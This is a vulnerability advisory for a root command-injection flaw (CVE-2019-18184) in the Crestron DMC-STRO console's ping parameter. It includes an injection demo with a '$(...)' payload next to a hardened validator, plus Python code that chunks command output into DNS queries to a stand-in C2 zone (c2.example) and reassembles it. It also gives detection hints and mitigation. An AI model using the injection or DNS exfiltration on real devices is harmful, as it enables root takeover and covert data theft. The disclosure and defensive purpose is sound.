Crestron DMC-STRO Remote Root RCE


    CVE ID: CVE-2019-18184
    Affected Products and Versions: CRESTRON DMC-STRO firmware 1.0

    Executive Summary
    A critical vulnerability was discovered in the CTP console of the Crestron DMC-STRO device. Through bash command substitution in a console command parameter, a user with access to the console can execute arbitrary commands on the system as the root user.

    Additional Information
    The parameters of the CTP console's 'ping' command are passed to bash without sanitization, so a command substitution such as $(...) placed in a parameter is expanded and executed on the device as the root user.

    [Screenshot: RCE DMC-STRO in ping parameters]
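    The following is an added illustration of the bug class, not code from the advisory or from the Crestron firmware. It assumes the console handler builds a single shell command line from the user-supplied host and hands it to the shell; 'echo' stands in for the real ping binary so the demo runs without network access, and the substitution behaviour is the same. The hardened variant shows the two checks a practitioner would want: an allow-list validator for the target, and an argv call that never involves a shell.

```python
import ipaddress
import re
import subprocess


def vulnerable_ping(host: str) -> str:
    """Assumed shape of the flawed handler: the host is interpolated into a
    shell command line. '$(...)' and backticks in 'host' are expanded by the
    shell (sh and bash behave identically here) before 'echo' ever runs."""
    cmd = f"echo PING {host}"   # user input becomes part of the shell line
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# RFC 1123 style hostname: labels of 1-63 alphanumerics/hyphens, no leading or
# trailing hyphen, at most 253 characters in total.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def is_valid_target(host: str) -> bool:
    """Accept only an IP literal or a plain hostname. Everything else,
    including '$(...)', backticks, ';', '|' and whitespace, is rejected
    before the value gets anywhere near a shell."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def hardened_ping(host: str) -> str:
    """Validate, then exec with an argv list: no shell parses the argument,
    so a substitution could not expand even if validation missed it."""
    if not is_valid_target(host):
        raise ValueError(f"invalid ping target: {host!r}")
    return subprocess.run(["echo", "PING", host], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "$(echo INJECTED)"
    print("vulnerable:", vulnerable_ping(payload).strip())   # substitution ran
    try:
        hardened_ping(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

    Note that quoting the interpolated value inside the command line ("echo PING '$host'") is not a fix: a single quote inside the parameter closes the string again. Only the combination of validation and a no-shell exec removes the issue.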

    Using a DNS covert channel it was possible to enumerate the binaries available under /bin and /usr/bin, which showed that a Lua interpreter was present on the device. I therefore wrote a Lua script that executes commands on the target, base64-encodes the output, splits it into chunks, and sends the chunks back to the C2 server as DNS queries.

    On the C2 side the base64 chunks are reassembled in order and decoded to recover the output of the executed command.

    [Screenshot: Decode Base64 encoded payload]
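    The chunking and reassembly described above, as an added example that is not the author's Lua script or C2 tooling. The query-name layout (a sequence number label, a base64url chunk label, then the C2 zone) and the zone name c2.example are assumptions made for the example; the sample command output is constructed, not captured from a device. The reassembly handles what a real resolver log looks like: queries arrive out of order, retries produce duplicates, and unrelated names hit the same nameserver.

```python
import base64
import re

# Assumed C2 zone: any zone the attacker's nameserver is authoritative for works.
C2_DOMAIN = "c2.example"

# DNS labels are limited to 63 octets. base64url is used because standard base64
# contains '+', '/' and '=', which are not safe in hostnames; padding is stripped
# on the target and restored on the C2.
LABEL_MAX = 63


def chunk_for_dns(output: bytes, domain: str = C2_DOMAIN, label_max: int = LABEL_MAX) -> list:
    """Target side: encode command output and split it into query names of the
    form '<seq>.<chunk>.<domain>'. The sequence number lets the C2 restore
    order, since recursive resolvers do not preserve query order."""
    encoded = base64.urlsafe_b64encode(output).rstrip(b"=").decode("ascii")
    chunks = [encoded[i:i + label_max] for i in range(0, len(encoded), label_max)]
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]


QUERY_RE = re.compile(r"^(\d+)\.([A-Za-z0-9_-]+)\.(.+)$")


def reassemble(query_names, domain: str = C2_DOMAIN) -> bytes:
    """C2 side: collect chunk queries from a resolver log, drop duplicates,
    verify nothing is missing, restore order and decode."""
    chunks = {}
    for name in query_names:
        m = QUERY_RE.match(name.rstrip("."))       # tolerate FQDN trailing dot
        if not m or m.group(3) != domain:
            continue                               # unrelated query, ignore
        seq, chunk = int(m.group(1)), m.group(2)
        chunks.setdefault(seq, chunk)              # retries resend the same chunk
    if not chunks:
        return b""
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    joined = "".join(chunks[i] for i in range(len(chunks)))
    joined += "=" * (-len(joined) % 4)             # restore stripped padding
    return base64.urlsafe_b64decode(joined)


# Constructed sample output (not a real capture): 'id' followed by a placeholder
# 'uname -a' line, long enough to need two chunks.
SAMPLE_OUTPUT = (
    b"uid=0(root) gid=0(root) groups=0(root)\n"
    b"Linux dmc-stro 0.0.0 armv7l GNU/Linux\n"
)


def demo() -> bytes:
    queries = chunk_for_dns(SAMPLE_OUTPUT)
    # Simulated resolver log: reversed order, one retry, one unrelated lookup.
    seen = list(reversed(queries)) + [queries[0], "www.c2.example"]
    return reassemble(seen)


if __name__ == "__main__":
    for q in chunk_for_dns(SAMPLE_OUTPUT):
        print(q)
    print(demo().decode())
```

    For detection, the same properties that make this channel work are what stand out in DNS logs: many unique, never-repeating subdomains of one zone, labels near the 63-octet limit, and a high-entropy alphabet. The chunker above never emits a label longer than 63 octets, which a DNS server would otherwise reject.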

    We suggest blocking access to the CTP console with a firewall rule and updating the DMC-STRO firmware.

    Gabrio Tognozzi <g.tognozzi AT NOISESKIPME quantumleap.it>; <gtognozzi AT NOISESKIPME deloitte.it>

    19/09/2019 Vulnerability was reported to the vendor
    07/10/2019 Vendor confirmed the vulnerability was queued for a fix
    27/11/2019 Vulnerability details published